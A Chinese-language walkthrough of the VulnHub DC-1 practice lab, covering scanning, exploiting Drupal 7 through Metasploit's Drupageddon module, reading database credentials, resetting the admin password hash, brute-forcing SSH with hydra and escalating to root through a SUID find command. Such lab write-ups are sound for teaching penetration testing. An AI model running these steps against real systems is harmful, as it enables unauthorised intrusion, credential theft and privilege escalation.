DC系列:1 (DC-1靶机,初级渗透详细教程)
DC-1靶机渗透
- 环境搭建
- 详情
- 描述
- 使用工具
- 一:信息收集
- 基础信息查询
- 0x01 查看存活主机
- 0x02 查看开放端口
- 0x03 查看端口服务
- 0x04 扫描网站根目录及指纹信息
- 0x05 访问开放网页
- 二:漏洞发现
- msf漏洞查询
- 0x01 启动msf
- 0x02 flag1
- 0x03 flag2
- 0x04 查询数据库信息
- 三:漏洞利用
- ssh远程连接漏洞
- 0x01 破解密码加密
- 0x02 flag3
- 0x03 爆破flag4用户密码
- 0x04 ssh远程连接
- 0x05 flag4
- 四:提权
- 总结
find提权详解
find详解.
环境搭建
详情
名称 | DC- 1 |
---|---|
发布日期 | 2019年2月28日 |
作者 | DCAU |
系列 | DC |
网页 | https://www.vulnhub.com/entry/dc-1,292/ |
描述
DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。
它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。
要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot
Security OS上找到的工具。有多种方法可以获得根,但是,我包含了一些包含初学者线索的标志。
总共有五个标志,但最终目标是在root的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root
用户权限。根据您的技能水平,您可以跳过查找这些标志中的大多数,直接找到root。
初学者可能会遇到他们以前从未遇到过的挑战,但是Google搜索应该是获取完成此挑战所需的信息所需的全部内容。
使用工具
攻击者:kali 192.168.10.153
靶机:dc-1 192.168.10.157
一:信息收集
基础信息查询
0x01 查看存活主机
arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探
0x02 查看开放端口
masscan --rate=10000 --ports 0-65535 192.168.10.157
0x03 查看端口服务
nmap -sV -T4 -O -p 80,111,22 192.168.10.157
查询发现,目标靶机开放ssh远程连接服务,HTTP服务,rpcbind服务(此服务可用利用,形成资源占用攻击,这里用处不大但要知道)
0x04 扫描网站根目录及指纹信息
whatweb http://192.168.10.157 扫描网站指纹信息
可以发现,目标靶机的CMS建站系统为Drupal 7 可以尝试查看对应的版本漏洞
dirb http://192.168.10.157 /usr/share/dirb/wordlists/big,txt
0x05 访问开放网页
发现一个登录窗口,尝试SQL注入失败,尝试其他方法
二:漏洞发现
msf漏洞查询
0x01 启动msf
msfconsole
search Drupal 7
一个个尝试着使用(Rank 为excellent的成功概率大一点,比较好用)
use auxiliary/gather/drupal_openid_xxe
set lhost 192.168.10.157
set Rhosts 192.168.10.157
show options
run
第一个漏洞失败,经尝试发现,exploit/multi/http/drupal_drupageddon
这个漏洞可以利用成功
shell 后,python -c 'import pty;pty.spawn("/bin/bash")'开启终端
0x02 flag1
可以在/var/www 目录下查找到flag1
flag提示我们查看config配置文件,
百度之后发现,Drupal的配置文件(settings.php)在sites/default/files 中
cd到sites/default/中查看
0x03 flag2
查找到MySQL数据库账户及密码,尝试登录查找信息
0x04 查询数据库信息
mysql -u dbuser -p R0ck3t
登录成功,查询账号密码
show databases;
use drupaldb
show tables;
select* from users;
查询到账户密码,这里的密码为密文加密,尝试使用md5解密,发现解密失败
三:漏洞利用
ssh远程连接漏洞
0x01 破解密码加密
法一:
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号,使用此方法简便了破解admin的密码,更为直接。
查看数据库信息:
新用户 admin2 admin2创建成功,可以进行登陆
方法二:
drupal可以利用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下
使用加密脚本加密新密码:qwer,生成加密密文,将所得密文替换MySQL数据库中的原有密文,实现密码更新
find -name password_hash* 查找到文件的存在位置
srcipt/password-hash.sh qwer 将加密结果更新到数据库中,即可登录
update users set
password='$S$DIMTIl9Ae8pGs0FNqTaQ06uFIe
/xYadkJCoQJaLaFzLXZej/SAAp'
where uid=1; 更新admin账户的密码,尝试登录
0x02 flag3
登录查看flag3,提示到 find提权,-exec shadow文件 passwd文件
查看passwd文件,发现flag4是一个用户
0x03 爆破flag4用户密码
gzip -d rockyou.tar 解压密码字典
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.157
尝试爆破flag4的密码
爆破成功,密码为orange
0x04 ssh远程连接
0x05 flag4
其实完全不需要ssh远程连接即可查看到flag4(flag4是一个用户,则cd/home/flag4 查看其中有无flag文件,查找到flag4.txt)
四:提权
根据flag3中提示可以find提权
使用find命令查找有特殊权限suid的命令
发现find具有su权限,尝试使用find提权
find / -name 233 -exec "/bin/sh" \;
提权成功,找到flag5,渗透结束
总结
此次渗透,考察ssh爆破,drupal文件配置路径信息,find提权用法等知识点,多多练习,百炼成钢。
DC系列:1 (DC-1靶机,初级渗透详细教程)相关推荐
- DC-6靶机测试渗透详细教程
1.首先扫描我们要渗透机器的IP 2. 接着我们扫描IP的端口和操作系统 我们扫到目标机的80端口开启了,我们进行查看目标机的80端口.(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和 ...
- 【vulnhub】靶机- [DC系列]DC9(附靶机))
主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...
- Vulnhub靶机:DC-7渗透详细过程
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...
- Vulnhub靶机:DC-8渗透详细过程
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测 ...
- Vulnhub靶机:DC-3渗透详细过程
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试 ...
- DC-3靶机渗透详细教程(附靶机链接)
靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg 提取码:0na8 首先查看本机kali的ip地址:192.168.159.145 ifconf ...
- 超牛叉的外网渗透详细教程
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器. 但是内网渗透哪有外网刺激 ...
- 2021最新IDEA初级入门详细教程流出,开发组小伙伴怒赞
本次安装的 IntelliJ IDEA 版本:2020.2 (当前最新版本,2020.07.28发布的202.6397.94版) 官方推荐的安装条件(指当前你手里电脑的配置)如下: 1.64位版本的 ...
- Web安全渗透详细教程+学习线路+详细笔记【全网最全】
1. 序章 1.1. Web技术演化 1.2. 网络攻防技术演化 1.3. 网络安全观 2. 计算机网络与协议 2.1. 网络基础
最新文章
- vs报错 已经在 helpers.obj 中定义
- Winform 导出成Excel打印代码
- Enhanced ABAP Development with Core Data Services (CDS)
- perf之sched
- 写一个 JavaScript 框架:比 setTimeout 更棒的定时执行
- android数据回传多个页面_Android Day06四大组件之Activity多页面跳转和数据传递
- vfp字符转换数值_JS数据类型转换与字面量
- php显示mysql数据实例_php 连接mysql数据库并显示数据 实例 转载 aoguren
- 9 Unconstrained minimization
- excel导入数据到sqlserver
- 几位阿里朋友重写的Java并发编程,牛逼了
- android ffmpeg 优点_在Android中使用FFmpeg(android studio环境)
- 【汇编语言与计算机系统结构笔记14】循环和分支程序设计
- php preg split,php preg_split()字符串分割函数的使用方法
- PHP连接mysql8.0出错“SQLSTATE[HY000] [2054] The server requested authentication method unknow........
- 下一步目标:整理出1套相对成熟的ios 开发框架
- 【渝粤教育】电大中专公共基础课程 (2)作业 题库
- Linux 迅雷 chrome插件,Chrome(Chromium)迅雷下载支持扩展1.1测试版【更新】
- Inno Setup 制作安装包问题总结
- 2018,来年只剩追忆
热门文章
- mac下查看隐藏文件夹
- 对牛乱弹琴 | Playin' with IT
- MacOS解决sudo权限问题以及授予非管理员用户根目录管理权限
- IBM服务器内存条位置,ibm x3250m3服务器内存安装方法
- python报错:patsy.PatsyError: error tokenizing input (maybe an unclosed string?)
- 为什么在房间里显示无服务器,家里路由器在客厅,房间没信号怎么办?
- android recyclerView Binary XML file line #7: Error inflating class android.support.v7.widget.Recycl
- 沉睡者IT - 10个问题说清楚:什么是元宇宙?
- Rational Rose 2007简单介绍及详细安装步骤
- char matlab中,matlab中char什么意思